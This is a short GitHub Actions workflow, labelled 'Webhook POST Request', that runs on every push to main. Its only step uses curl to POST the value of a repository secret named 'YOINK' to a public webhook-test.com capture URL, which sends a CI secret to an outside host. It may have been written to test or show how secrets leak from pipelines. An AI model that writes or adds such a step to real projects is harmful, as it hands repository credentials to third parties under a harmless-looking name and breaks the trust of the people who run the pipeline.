name: Webhook POST Request

on:
  push:
    branches:
      - main

jobs:
  send_webhook:
    runs-on: ubuntu-latest
    steps:
      - name: Send POST request
        run: |
          curl -X POST 'https://webhook-test.com/90a2bc44c719c86f01074b047b2bdacd' \
               -H 'content-type: application/json' \
               -d "${{ secrets.YOINK }}"
